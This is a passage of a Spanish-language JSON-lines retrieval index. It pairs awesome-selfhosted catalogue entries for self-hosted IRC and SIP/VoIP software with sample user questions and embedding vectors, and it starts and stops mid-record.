-0.05067, 0.05527, 0.04963, -0.05441, -0.00251, 0.1089, -0.00712, 0.0493, -0.13705, -0.02765, 0.05955, 0.04153, 0.08405, -0.01706, 0.00426, -0.10925, -0.0275, 0.05626, -0.03321, -0.03566, 0.0891, -0.04909, 0.02266, -0.00523, 0.01566, 0.01656, 0.00466, -0.0042, 0.00994, 0.09982, 0.09181, 0.02189, 0.02696, -0.00095, 0.01731, -0.03066, 0.01977, -0.00276, -0.06619, 0.02933, 0.02718, -0.09125, 0.07262, 0.00066, 0.02784, -0.02569, -0.05299, 0.01347, 0.02285, 0.03473, -0.03296, 0.04073, 0.01083, -0.02012, 0.04281, 0.0312, -0.06908, -0.02136, -0.00581, 0.03871, -0.05462, -0.02777, -0.02987, 0.04599, -0.03889, -0.01919, 0.03037, -0.02525, 0.03158, 0.04388, 0.05753, 0.00207, -0.07589, 0.07544, -0.05042, -0.03436, -0.02164, 0.01054, 0.02144, 0.03102, -0.06124, -0.00255, 0.01349, -0.00161, -0.0207, -0.03006, -0.06312, -0.00541, 0.00989, 0.10349, -0.03319, -0.02337, 0.03569, -0.02006, 0.00315, 0.04855, 0.01688, 0.0369, -0.02462, -0.0781, -0.07583, 0.02499, 0.08872, -0.02902, -0.02463, -0.01848, -0.02542, -0.0796, 0.02107, -0.03444, 0.01004, -0.07209, -0.00865, -0.02377, -0.02712, 0.03756, -0.04333]} +{"tipo": "pregunta", "herramienta": "Communication - IRC", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - IRC", "tema": "communication - irc", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - IRC: Ergo β€” Modern IRCv3 server written in Go, combining the features of an ircd, a services framework, and a bouncer [MIT, Go/Docker]. Glowing Bear β€” A web frontend for WeeChat [GPL-3.0, Nodejs]. InspIRCd β€” Modular IRC server written in C++ for Linux, BSD, Windows, and macOS [GPL-2.0, C++/Docker]. Kiwi IRC β€” Responsive web IRC client with theming support [Apache-2.0, Nodejs]. ngircd β€” Portable and lightweight Internet Relay Chat server for small or private networks [GPL-2.0, C/deb]. Quassel IRC β€” Distributed IRC client, meaning that one (or multiple) client(s) can attach to and detach from a central core [GPL-2.0, C++]. Robust IRC β€” IRC without netsplits. Distributed IRC server, based on RobustSession protocol [BSD-3-Clause, Go]. The Lounge β€” Self-hosted web IRC client [MIT, Nodejs/Docker]. UnrealIRCd β€” Modular, advanced and highly configurable IRC server written in C for Linux, BSD, Windows, and macOS [GPL-2.0, C]. Weechat β€” Fast, light and extensible chat client [GPL-3.0, C/Docker/deb]. ZNC β€” Advanced IRC bouncer [Apache-2.0, C++/deb].", "indexar": "cual es una alternativa libre a los clientes de chat tradicionales como WeeChat?", "v": [0.00252, 0.09489, -0.01689, 0.07063, -0.1041, -0.07965, 0.04681, -0.02027, -0.03642, -0.03799, -0.08151, -0.14789, -0.10796, 0.03216, 0.04483, 0.00873, 0.04228, -0.07633, 0.19311, -0.06852, -0.03003, 0.01563, -0.07632, -0.03996, -0.17811, 0.01963, 0.07207, 0.05754, -0.01175, 0.22143, 0.07305, -0.01952, 0.04763, 0.0639, 0.01927, -0.05929, 0.1067, -0.03303, -0.03754, -0.00991, 0.12427, -0.09591, -0.08393, 0.04743, 0.11146, -0.02957, -0.0896, -0.00657, 0.0103, 0.06593, -0.10821, -0.06013, -0.02338, 0.10408, 0.12115, 0.0175, 0.14386, -0.04483, -0.03277, -0.10548, -0.04099, 0.08305, 0.11422, -0.00245, 0.09427, -0.04109, -0.06003, 0.03403, -0.04502, 0.04681, 0.04421, 0.06809, -0.00076, 0.03498, -0.05186, 0.08659, -0.11651, 0.05328, -0.07335, -0.01352, 0.04737, -0.08942, 0.03666, 0.06155, -0.06125, -0.06486, 0.03936, -0.04386, 0.00459, -0.00422, 0.09873, 0.08346, 0.04557, 0.13915, 0.01184, -0.13454, -0.02249, 0.00384, -0.00133, 0.07416, 0.05395, 0.05559, -0.1099, 0.00815, 0.02132, -0.11682, 0.04532, -0.04333, -0.08649, 0.01759, 0.05156, 0.02437, 0.02437, 0.06243, -0.00565, -0.05811, 0.00147, -0.02314, 0.02774, 0.0609, -0.11117, 0.06556, 0.00409, -0.03702, -0.03239, 0.02081, 0.00624, 0.06728, -0.03072, 0.06855, 0.0148, -0.02046, -0.05602, -0.09871, -0.05324, 0.06706, 0.14105, 0.01077, 0.06842, -0.00419, -0.00381, -0.001, -0.0099, -0.09248, 0.16773, 0.02174, 0.01027, -0.08241, -0.02244, 0.02661, -0.04006, 0.06106, -0.03136, 0.09208, -0.04313, -0.01617, -0.05305, -0.06674, -0.01611, 0.15338, 0.02229, -0.08988, 0.0582, 0.01137, -0.01295, 0.01549, -0.04106, -0.01897, -0.01275, -0.04087, -0.00265, 0.02489, 0.08339, -0.05299, 0.01402, 0.02968, -0.02816, -0.08016, 0.04981, -0.08209, -0.03698, -0.03121, -0.06371, -0.05216, -0.00293, -0.04611, -0.02714, 0.04868, 0.02578, 0.04521, -0.06651, 0.03881, -0.08607, -0.08919, -0.06978, -0.01124, -0.02181, -0.02252, -0.0579, -0.02003, -0.01923, 0.02873, -0.00878, -0.02972, -0.04182, 0.05677, -0.01445, 0.01933, -0.00219, 0.07493, 0.03635, -0.03625, 0.10132, 0.02281, 0.01103, 0.01246, 0.0492, -0.0788, -0.02991, -0.00499, 0.02573, 0.03408, 0.05459, 0.02057, -0.0038, 0.04442, 0.04862, 0.1091, -0.00305, 0.00963, -0.00868, -0.017, 0.00072, -0.05407, 0.08329, 0.03133, 0.02975, -0.0101, -0.05923, -0.04819, 0.0331, 0.04856, -0.02343, 0.00332, -0.02558, 0.0012, -0.13093, 0.00624, -0.05709, -0.01826, -0.03431, 0.06593, 0.05903, -0.02495, 0.0332, -0.04118]} +{"tipo": "pregunta", "herramienta": "Communication - IRC", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - IRC", "tema": "communication - irc", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - IRC: Ergo β€” Modern IRCv3 server written in Go, combining the features of an ircd, a services framework, and a bouncer [MIT, Go/Docker]. Glowing Bear β€” A web frontend for WeeChat [GPL-3.0, Nodejs]. InspIRCd β€” Modular IRC server written in C++ for Linux, BSD, Windows, and macOS [GPL-2.0, C++/Docker]. Kiwi IRC β€” Responsive web IRC client with theming support [Apache-2.0, Nodejs]. ngircd β€” Portable and lightweight Internet Relay Chat server for small or private networks [GPL-2.0, C/deb]. Quassel IRC β€” Distributed IRC client, meaning that one (or multiple) client(s) can attach to and detach from a central core [GPL-2.0, C++]. Robust IRC β€” IRC without netsplits. Distributed IRC server, based on RobustSession protocol [BSD-3-Clause, Go]. The Lounge β€” Self-hosted web IRC client [MIT, Nodejs/Docker]. UnrealIRCd β€” Modular, advanced and highly configurable IRC server written in C for Linux, BSD, Windows, and macOS [GPL-2.0, C]. Weechat β€” Fast, light and extensible chat client [GPL-3.0, C/Docker/deb]. ZNC β€” Advanced IRC bouncer [Apache-2.0, C++/deb].", "indexar": "con que puedo montar un servidor de chat en lΓ­nea que soporte mΓΊltiples dispositivos al mismo tiempo?", "v": [0.00975, 0.14572, -0.21878, -0.15836, -0.17901, -0.04925, -0.04887, -0.0404, -0.07169, -0.05018, -0.09384, -0.01285, 0.07156, -0.05431, 0.08137, 0.04073, 0.07374, -0.12948, 0.04029, -0.03923, 0.02738, -0.02531, 0.01262, -0.04799, -0.07051, 0.10204, 0.10282, -0.03432, -0.12548, 0.04589, -0.00993, 0.04075, 0.01957, 0.06817, -0.02434, -0.14231, -0.06338, 0.12872, -0.05689, 0.00172, 0.00253, -0.04003, -0.04948, 0.01047, 0.0616, -0.02083, -0.00485, -0.02477, 0.0293, 0.03853, -0.05103, -0.08898, -0.06672, 0.04382, -0.10052, -0.01752, 0.25677, -0.13885, 0.08477, -0.0843, -0.09947, 0.00553, -0.02614, -0.00625, 0.04247, 0.02626, -0.10353, 0.01476, -0.1264, -0.08136, -0.05443, 0.02901, 0.03029, -0.01011, 0.02783, 0.1264, -0.05409, 0.01604, 0.0493, 0.05094, 0.02655, 0.01338, -0.01646, 0.11596, -0.08244, -0.05332, 0.00464, -0.01588, 0.02506, -0.00115, 0.07746, 0.06958, -0.04185, 0.03604, -0.03152, -0.09947, 0.02155, 0.01777, 0.06044, -0.00725, 0.05387, 0.04935, -0.08349, 0.07564, -0.02621, 0.03534, 0.10997, -0.09941, 0.09135, -0.0671, 0.04438, -0.03163, -0.04707, -0.03503, -0.03212, -0.07441, 0.04636, -0.03501, 0.027, 0.03311, 0.00225, 0.02551, 0.08468, 0.0317, 0.10589, -0.04128, 0.04513, -0.00646, 0.06113, -0.0445, -0.02919, 0.01938, -0.01487, -0.05347, -0.03511, 0.10866, 0.04128, -0.00427, -0.02426, -0.07579, 0.12696, 0.03057, -0.07694, -0.05992, 0.11354, -0.01082, 0.02309, -0.15733, -0.06435, 0.0006, 0.06247, 0.06423, -0.01111, 0.07047, -0.08383, -0.00167, -0.00124, -0.04977, 0.00081, 0.09769, -0.0043, 0.04366, 0.01436, 0.05198, -0.02251, -0.00615, -0.04266, 0.02857, 0.11624, 5e-05, -0.06896, 0.06392, 0.04956, -0.05039, -0.01152, -0.013, -0.03213, 0.01012, 0.02323, -0.06148, -0.07911, 0.00952, -0.01732, -0.03804, -0.08352, -0.0523, -0.01837, -0.00123, 0.00641, 0.02084, 0.03557, 0.04349, -0.06711, 0.06656, 0.02662, -0.07856, -0.02372, -0.00131, 0.02962, -0.03403, -0.06015, 0.0038, 0.00231, -0.03816, 0.01458, 0.02122, -0.06856, 0.06006, 0.0278, 0.03456, 0.02376, -0.04856, 0.11596, -0.05209, -0.03554, -0.0056, 0.07059, -0.06935, -0.0451, -0.01323, 0.0219, 0.03098, 0.04195, 0.05672, -0.00333, 0.03606, 0.03662, 0.03982, 0.05073, 0.00069, -0.0315, -0.01441, -0.03286, -0.05373, 0.0668, 0.01266, 0.09132, -0.05021, -0.06018, -0.042, -0.00836, 0.08997, -0.00878, -0.01367, -0.02556, -0.07817, -0.09474, 0.0194, -0.0482, -0.08728, -0.01918, 0.04342, 0.02253, -0.05351, -0.00717, -0.03624]} +{"tipo": "pregunta", "herramienta": "Communication - SIP", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - SIP", "tema": "communication - sip", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - SIP: Asterisk β€” Easy to use but advanced IP PBX system, VoIP gateway and conference server [GPL-2.0, C/deb]. Flexisip β€” Complete, modular and scalable SIP server, includes a push gateway, to deliver SIP incoming calls or text messages on mobile device platforms where push notifications are required to receive information when the app is not active in the foreground [AGPL-3.0, C/Docker]. Freepbx β€” Web-based open source GUI that controls and manages Asterisk [GPL-2.0, PHP]. FreeSWITCH β€” Scalable open source cross-platform telephony platform [MPL-2.0, C]. FusionPBX β€” Web interface for multi-platform voice switch called FreeSWITCH [MPL-1.1, PHP]. Kamailio β€” Modular SIP server (registrar/proxy/router/etc) [GPL-2.0, C/deb]. openSIPS β€” SIP proxy/server for voice, video, IM, presence and any other SIP extensions [GPL-2.0, C]. Routr β€” Lightweight SIP proxy, location server, and registrar for a reliable and scalable SIP infrastructure [MIT, Docker/K8S]. SIP3 β€” VoIP troubleshooting and monitoring platform [Apache-2.0, Java].", "indexar": "que herramienta sirve para configurar un servidor telefΓ³nico VoIP desde una interfaz web?", "v": [0.04874, 0.0708, -0.23539, -0.22429, 0.10112, -0.19174, 0.03989, -0.0976, 0.01651, -0.01332, 0.04589, -0.077, 0.04097, -0.09247, 0.04618, 0.04477, 0.13812, -0.16172, 0.12732, 0.01149, 0.02904, 0.13279, -0.06641, 0.0079, -0.0875, 0.05638, -0.023, -0.08399, -0.10784, -0.06175, 0.00905, -0.15411, 0.05446, 0.00445, -0.07274, -0.06174, 0.0338, 0.1466, -0.01787, 0.04493, 0.05291, 0.01971, -0.09666, 0.05949, 0.04017, 0.00261, 0.01104, -0.08491, 0.11331, 0.07977, -0.05642, -0.18436, -0.07248, 0.0368, -0.08455, 0.02372, 0.17711, -0.19226, 0.01125, -0.0804, -0.08316, 0.0038, -0.01442, -0.0062, 0.09367, -0.02865, -0.07062, -0.05634, -0.01473, -0.05316, -0.04265, 0.10209, -0.02063, -0.0164, 0.1224, 0.00993, -0.0332, -0.03029, 0.11927, 0.05499, 0.09791, -0.01796, -0.09813, 0.02664, -0.14687, -0.00407, 0.07721, -0.01209, -0.01891, -0.0653, 0.08218, 0.09784, -0.07452, -0.0206, 0.02538, -0.04192, 0.03971, 0.00638, 0.01812, -7e-05, 0.1481, 0.03212, -0.1489, 0.06465, 0.02813, 0.04764, 0.03909, -0.00333, 0.01553, -0.03939, 0.03312, -0.00493, 0.00216, -0.00135, -0.02575, -0.02848, 0.06347, 0.01509, 0.02668, -0.0449, -0.027, 0.02955, -0.00347, 0.00834, -0.04, 0.04011, 0.02794, 0.07695, 0.06884, -0.00445, 0.02651, -0.10202, -0.05236, -0.00475, 0.01812, 0.0379, 0.01524, -0.07034, 0.02402, -0.03073, 0.01351, 0.00303, -0.03691, -0.06653, 0.05623, 0.02416, 0.05554, -0.08166, -0.04812, -0.02517, 0.02027, -0.06775, -0.02425, 0.04957, -0.10324, 0.00675, -0.0599, -0.01739, -0.08515, 0.03918, 0.00702, -0.0379, 0.05953, 0.03287, 0.02699, -0.03563, -0.0701, 0.04528, 0.09441, 0.04787, -0.00558, -0.02075, 0.04716, -0.04688, -0.05631, 0.02403, -0.07576, 0.02089, 0.01332, -0.04292, -0.04549, -0.0069, 0.011, -0.0069, -0.01128, 0.00018, -0.04239, 0.00236, -0.03769, -0.00025, 0.00298, 0.07813, -0.01703, 0.04575, 0.05313, -0.03281, -0.0462, -0.05747, -0.01435, -0.0506, -0.06313, -0.03081, -0.02871, -0.08472, 0.01522, 0.05236, -0.01694, -0.02059, 0.00888, 0.04092, -0.0143, -0.03249, 0.06062, -0.02903, 0.00162, -0.02699, 0.07126, -0.03595, -0.01073, -0.0118, 0.00764, 0.01038, 0.01627, 0.02163, 0.01039, 0.0419, -0.00456, -0.00433, 0.01103, -0.00196, -0.04288, -0.01545, 0.00421, -0.03708, 0.00578, -0.01905, 0.03198, -0.03511, -0.06454, -0.07339, -0.00654, 0.05735, -0.01607, -0.02797, -0.0378, -0.07792, -0.02108, -0.00696, -0.03231, -0.06559, -0.03567, 0.01075, 0.06713, 0.01587, -0.01563, 0.0126]} +{"tipo": "pregunta", "herramienta": "Communication - SIP", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - SIP", "tema": "communication - sip", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - SIP: Asterisk β€” Easy to use but advanced IP PBX system, VoIP gateway and conference server [GPL-2.0, C/deb]. Flexisip β€” Complete, modular and scalable SIP server, includes a push gateway, to deliver SIP incoming calls or text messages on mobile device platforms where push notifications are required to receive information when the app is not active in the foreground [AGPL-3.0, C/Docker]. Freepbx β€” Web-based open source GUI that controls and manages Asterisk [GPL-2.0, PHP]. FreeSWITCH β€” Scalable open source cross-platform telephony platform [MPL-2.0, C]. FusionPBX β€” Web interface for multi-platform voice switch called FreeSWITCH [MPL-1.1, PHP]. Kamailio β€” Modular SIP server (registrar/proxy/router/etc) [GPL-2.0, C/deb]. openSIPS β€” SIP proxy/server for voice, video, IM, presence and any other SIP extensions [GPL-2.0, C]. Routr β€” Lightweight SIP proxy, location server, and registrar for a reliable and scalable SIP infrastructure [MIT, Docker/K8S]. SIP3 β€” VoIP troubleshooting and monitoring platform [Apache-2.0, Java].", "indexar": "cual es la mejor opcion libre para gestionar llamadas IP y conferencias?", "v": [0.14749, 0.08975, -0.10377, -0.14199, 0.01381, -0.19419, 0.0504, -0.01997, -0.15949, -0.02408, 0.03934, -0.10586, 0.00105, -0.03864, -0.03571, 0.11219, 0.08216, -0.02216, 0.08148, -0.0748, -0.07446, 0.16637, -0.09826, -0.11076, -0.0753, 0.02781, -0.00252, -0.01474, 0.00862, -0.10309, -0.01701, -0.14333, 0.00452, -0.06658, 0.01035, 0.0478, -0.01653, 0.14911, 0.01565, 0.01019, -0.10584, 0.02818, -0.09173, 0.02811, 0.17368, -0.02632, -0.00594, 0.03225, 0.00639, -0.05947, -0.15049, -0.09898, 0.0052, -0.00127, -0.09423, 0.0357, 0.03372, -0.07339, -0.03107, -0.01782, -0.00479, 0.05399, 0.00177, -0.00693, 0.06488, -0.05306, -0.04034, 0.03272, -0.05518, 0.00219, -0.06453, -0.05072, -0.04065, 0.16718, 0.15354, 0.03888, -0.02435, -0.01944, 0.02927, 0.08681, 0.0789, -0.01309, -0.07769, 0.06693, -0.13928, 0.04854, 0.04394, -0.11409, -0.07656, -0.00309, 0.04711, 0.00743, -0.00403, -0.04986, -0.01058, -0.05475, 0.0376, 0.05987, 0.00107, 0.06555, 0.04863, 0.12544, -0.12517, 0.08517, 0.00709, 0.08769, 0.04912, -0.05867, 0.01601, -0.04558, -0.12404, 0.01294, 0.04036, 0.00886, -0.00013, -0.02927, 0.03502, -0.08803, 0.05519, 0.01617, 0.02717, -0.04617, 0.01458, -0.04114, -0.00792, 0.0586, -0.01005, 0.09313, 0.04263, 0.01204, 0.08145, -0.0581, -0.02028, -0.12561, 0.04553, 0.01999, 0.06227, -0.01412, 0.00314, -0.02866, -0.03654, 0.07492, 0.02659, -0.04116, 0.11296, -0.00919, 0.01166, -0.03755, 0.0986, -0.06236, 0.03332, 0.00829, 0.05756, 0.14193, -0.02344, -0.0201, -0.10979, -0.09653, -0.00627, 0.15474, -0.01634, -0.02389, 0.01665, -0.04558, 0.02252, -0.00321, -0.0156, 0.0579, 0.0009, 0.01477, 0.01798, -0.00085, 0.00566, -0.07473, -0.07071, -0.09938, -0.00767, -0.04432, 0.04245, -0.12118, 0.00655, -0.00437, -0.058, -0.082, 0.03317, 0.05136, -0.02614, 0.05626, 0.03102, -0.03189, 0.0473, 0.07468, -0.03008, 0.01061, 0.00485, -0.07712, -0.05757, -0.1374, 0.01391, -0.01603, -0.10373, -0.00794, -0.02059, 0.00805, 0.03716, 0.04824, -0.03842, 0.02701, 0.00957, 0.03055, 0.01467, 0.0116, 0.0764, -0.05825, -0.07297, -0.01737, -0.01377, -0.01203, -0.01964, 0.0002, 0.04375, -0.02144, -0.01693, -0.02188, 0.01229, 0.03542, -0.03239, 0.00039, -0.04276, 0.00306, -0.01692, 0.03385, -0.02462, -0.02161, 0.016, 0.04201, 0.0659, 0.00957, 0.01787, -0.06615, -0.02106, 0.04439, -0.01711, -0.02196, -0.01519, -0.0191, -0.09139, 0.04957, -0.02668, -0.0542, -0.03159, 0.04976, 0.01927, 0.02684, 0.03101, 0.01109]} +{"tipo": "pregunta", "herramienta": "Communication - SIP", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - SIP", "tema": "communication - sip", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - SIP: Asterisk β€” Easy to use but advanced IP PBX system, VoIP gateway and conference server [GPL-2.0, C/deb]. Flexisip β€” Complete, modular and scalable SIP server, includes a push gateway, to deliver SIP incoming calls or text messages on mobile device platforms where push notifications are required to receive information when the app is not active in the foreground [AGPL-3.0, C/Docker]. Freepbx β€” Web-based open source GUI that controls and manages Asterisk [GPL-2.0, PHP]. FreeSWITCH β€” Scalable open source cross-platform telephony platform [MPL-2.0, C]. FusionPBX β€” Web interface for multi-platform voice switch called FreeSWITCH [MPL-1.1, PHP]. Kamailio β€” Modular SIP server (registrar/proxy/router/etc) [GPL-2.0, C/deb]. openSIPS β€” SIP proxy/server for voice, video, IM, presence and any other SIP extensions [GPL-2.0, C]. Routr β€” Lightweight SIP proxy, location server, and registrar for a reliable and scalable SIP infrastructure [MIT, Docker/K8S]. SIP3 β€” VoIP troubleshooting and monitoring platform [Apache-2.0, Java].", "indexar": "con que programa puedo recibir notificaciones de llamadas en mis dispositivos movil sin tener la app abierta?", "v": [0.09252, 0.20685, -0.178, -0.15077, 0.02619, -0.00571, -0.06993, 0.04598, -0.10249, -0.05087, -0.06653, -0.09896, 0.11052, -0.00141, 0.00548, -0.01624, 0.05349, -0.10015, 0.04839, 0.04891, 0.01493, 0.07294, -0.07334, -0.06636, -0.06067, 0.1247, 0.03669, 0.03274, -0.07799, -0.09516, 0.06229, -0.13844, 0.11291, -0.02493, -0.03725, 0.02285, -0.01156, 0.02042, -0.03983, -0.04569, -0.01242, -0.02889, -0.1024, -0.02336, 0.06634, -0.0204, -0.02623, -0.0017, -0.04805, 0.03029, -0.08255, -0.01551, -0.10588, 0.07421, -0.05801, 0.02846, 0.12662, -0.10105, 0.08648, -0.03699, 0.0021, -0.03957, 0.01477, 0.0037, 0.11231, -0.06376, 0.10788, 0.12559, -0.08607, -0.06578, 0.01248, 0.01671, 0.00141, 0.06614, 0.13691, 0.10422, -0.16849, -0.05177, 0.03905, 0.05082, 0.02049, -0.02437, -0.00528, 0.03013, -0.07855, 0.04672, 0.04272, 0.0231, -0.04315, -0.09959, 0.08737, 0.08104, -0.05861, 0.07062, 0.0133, -0.02164, -0.01253, 0.03756, 0.02097, 0.11958, 0.07625, -0.06308, -0.0625, 0.03015, -0.09908, 0.01163, 0.06674, -0.08492, 0.0757, -0.03949, -0.05172, -0.12033, -0.01683, 0.02442, -0.07339, 0.02183, -0.00972, -0.1, 0.01085, -0.01706, -0.05432, -0.01144, 0.07462, -0.01737, 0.1064, -0.0199, -0.05304, 0.05408, 0.07841, 0.12924, 0.11627, -0.0036, -0.0116, -0.04751, -0.0573, -0.0292, -0.01146, 0.05824, 0.07107, -0.03282, 0.05515, 0.05377, 0.02912, -0.02091, 0.05246, 0.04177, -0.04345, -0.03356, 0.00822, 0.02643, 0.00941, 0.00748, -0.01882, 0.0606, -0.0327, 0.00873, -0.03412, -0.09652, -0.01409, 0.12141, -0.06004, 0.02, -0.08955, -0.03597, -0.01872, -0.12596, 0.04368, 0.0299, 0.11778, -0.00523, -0.02593, 0.01351, 0.05379, -0.04301, -0.0667, -0.06381, -0.01966, 0.03172, 0.0416, -0.11313, -0.09715, 0.07235, -0.00795, -0.08564, -0.00936, 0.00039, -0.07798, -0.02058, 0.03759, 0.04916, 0.02453, 0.09566, 0.02951, 0.02337, -0.00617, -0.10275, -0.03029, -0.04303, 0.01402, -0.00185, -0.08384, -0.02662, -0.00649, -0.00657, 0.05703, 0.0488, -0.00642, 0.05126, -0.01625, 0.09986, 0.00258, -0.03162, 0.07016, 0.05024, -0.06439, -0.04724, 0.01976, 0.03398, -0.02094, 0.03898, 0.01344, -0.00225, 0.02638, 0.03767, -0.00411, 0.063, -0.00197, 0.03377, -0.00266, -0.01351, -0.02164, -0.02049, -0.0027, -0.04987, 0.04955, 0.03447, 0.03812, -0.04269, -0.0658, -0.0474, -0.01385, 0.06746, 0.0549, 0.02438, -0.06551, -0.01981, -0.02674, 0.00719, -0.00673, -0.07036, -0.00596, 0.13851, 0.0865, -0.04595, 0.07452, 0.02011]} +{"tipo": "pregunta", "herramienta": "Communication - SIP", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - SIP", "tema": "communication - sip", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - SIP: SIPCAPTURE Homer β€” Troubleshooting and monitoring VoIP calls [AGPL-3.0, Nodejs/Go/Docker]. Wazo β€” Full-featured IPBX solution built atop Asterisk with integrated Web administration interface and REST-ful API [GPL-3.0, Python]. Yeti-Switch β€” Transit class4 softswitch(SBC) with integrated billing and routing engine and REST API [GPL-2.0, C++/Ruby].", "indexar": "que programa puedo usar para monitorizar llamadas VoIP y solucionar problemas?", "v": [-0.00851, 0.13091, -0.27388, -0.15685, 0.00589, -0.15629, 0.05397, -0.10417, -0.07695, -0.08681, 0.06618, -0.10143, 0.01774, -0.03211, -0.01853, -0.03062, 0.00883, -0.12859, 0.08611, -0.01758, 0.05102, -0.00047, -0.06199, -0.02649, -0.12236, 0.20464, -0.04488, -0.08283, 0.01235, -0.13846, -0.09754, -0.14421, 0.07852, -0.03145, -0.1409, 0.00184, 0.0309, 0.0505, 0.00248, 0.12361, -0.00167, 0.04012, -0.06197, -0.08399, 0.12176, 0.02995, 0.04894, -0.03196, 0.03395, -0.03668, -0.12529, -0.003, -0.00938, 0.05599, 0.01413, -0.05404, 0.05894, -0.06414, -0.00828, -0.05354, -0.07118, -0.05349, 0.10285, -0.05157, 0.08118, -0.07629, 0.04036, -0.03402, -0.08229, 0.02093, -0.02509, 0.12231, -0.01343, 0.03514, 0.09888, 0.02958, -0.1072, -0.14857, 0.0588, -0.00307, 0.01151, 0.02523, -0.04085, 0.01648, -0.14649, -0.05408, 0.06298, -0.05898, -0.07449, -0.06981, 0.01489, 0.13411, 0.06031, -0.00714, 0.05385, -0.04287, 0.12778, 0.03091, -0.01687, 0.04748, 0.12534, -0.02093, -0.05331, 0.05685, -0.00683, -0.0116, 0.09608, -0.04936, 0.03015, -0.05037, -0.10965, 0.04494, -0.02129, -0.06699, -0.12071, -0.03809, -0.0085, 0.01708, -0.02456, -0.01735, -0.05324, 0.02614, 0.03337, -0.0299, 0.09932, -0.01429, 0.08134, 0.06908, 0.02766, 0.09132, 0.03481, -0.01045, -0.04508, -0.0965, -0.03474, -0.05715, -0.00929, 0.01126, 0.061, -0.00795, -0.0315, 0.06066, 0.02631, -0.02826, 0.05305, 0.06541, -0.04632, -0.06114, 0.00056, 0.01061, 0.06565, 0.02129, 0.0296, 0.07519, -0.03624, 0.03296, 0.00529, 0.03639, -0.01555, 0.05532, -0.03275, -0.04121, -0.00582, -0.01821, 0.0718, -0.07821, 0.00056, 0.09678, 0.08193, 0.03968, -0.01147, 0.03362, 0.01714, -0.1069, -0.04633, -0.01044, -0.04193, -0.03829, 0.00138, -0.06537, -0.11124, 0.09247, 0.01026, 0.01631, 0.01778, 0.01543, -0.04474, 0.03528, 0.03854, -0.00957, 0.01009, 0.05898, 0.02668, -0.01625, 0.0068, -0.0356, -0.04224, -0.07702, -0.02767, -0.05672, -0.10972, 0.05427, 0.00248, -0.02809, 0.05449, 0.04209, -0.07193, 0.05314, 0.07177, 0.04019, 0.01906, -0.02003, 0.05425, -0.01112, -0.03736, 0.0029, 0.00729, 0.03131, -0.01584, 0.00253, 0.02254, 0.00074, 0.0253, 0.05569, 0.01174, -0.01526, 0.04301, 0.05555, -0.02626, 0.01375, -0.03737, 0.00225, -0.01481, -0.04489, -0.01082, 0.02908, 0.00399, -0.01262, 0.03242, -0.05537, 0.00813, 0.06632, -0.00257, 0.03154, -0.05437, -0.0129, -0.02897, 0.04104, 0.01808, -0.0329, -0.0038, 0.08175, 0.03522, -0.01558, 0.06001, 0.0455]} +{"tipo": "pregunta", "herramienta": "Communication - SIP", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - SIP", "tema": "communication - sip", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - SIP: SIPCAPTURE Homer β€” Troubleshooting and monitoring VoIP calls [AGPL-3.0, Nodejs/Go/Docker]. Wazo β€” Full-featured IPBX solution built atop Asterisk with integrated Web administration interface and REST-ful API [GPL-3.0, Python]. Yeti-Switch β€” Transit class4 softswitch(SBC) with integrated billing and routing engine and REST API [GPL-2.0, C++/Ruby].", "indexar": "con que puedo montar un sistema telefΓ³nico completo con interfaz web?", "v": [0.1375, 0.1494, -0.20808, -0.12518, 0.00249, -0.03424, 0.05794, 0.02076, -0.16385, -0.01931, -0.02527, 0.01252, 0.06202, -0.02592, 0.04829, 0.03041, 0.03945, -0.13842, 0.1057, -0.07387, 0.00501, -0.03161, -0.11667, -0.09979, -0.0603, 0.03159, -0.05348, -0.11276, -0.11445, -0.06334, 0.07292, -0.06117, 0.1008, 0.02667, -0.0445, -0.05077, 0.06299, 0.11714, 0.04317, -0.06979, 0.04133, -0.00463, -0.07259, 0.06875, 0.10385, -0.02158, -0.0134, -0.11236, 0.03911, -0.01341, -0.01108, -0.08865, -0.09071, 0.02984, -0.0693, -0.08408, 0.18317, -0.0626, 0.03756, -0.0034, 0.02037, 0.08073, -0.0232, 0.09657, 0.09909, -0.03365, -0.06506, -0.00025, 0.00246, -0.03259, 0.00402, 0.02517, -0.00942, 0.00845, 0.07489, 0.05976, -0.0775, -0.03029, 0.1154, 0.05721, 0.05473, -0.05302, -0.04827, 0.03711, -0.07135, 0.08406, 0.01876, -0.04951, -0.06321, -0.09456, 0.12893, 0.01886, -0.01405, -0.05007, 0.01874, -0.07998, -0.04881, 0.10494, -0.01149, -0.00325, 0.02034, 0.02814, -0.11928, 0.13356, -0.00685, -0.06405, 0.0616, -0.01512, 0.02155, -0.065, -0.04861, -0.03044, -0.0232, -0.01307, -0.12133, -0.0566, 0.01336, 0.05858, -0.01833, -0.06134, -0.04448, 0.10137, 0.0517, -0.00774, 0.02854, 0.03047, 0.05513, 0.12765, 0.04722, 0.0482, 0.05934, -0.04893, -0.07462, -0.08604, 0.05713, 0.06499, -0.06422, 0.02079, 0.06486, 0.04078, -0.01217, 0.02869, 0.01221, -0.0927, 0.03048, 0.08057, 0.05716, -0.12279, -0.02982, -0.06741, 0.00952, 0.11329, 0.01071, 0.06146, -0.06355, -0.06136, 0.01043, -0.04389, 0.04653, 0.04271, 0.06303, 0.02626, -0.01202, 0.0353, -0.00823, -0.02466, 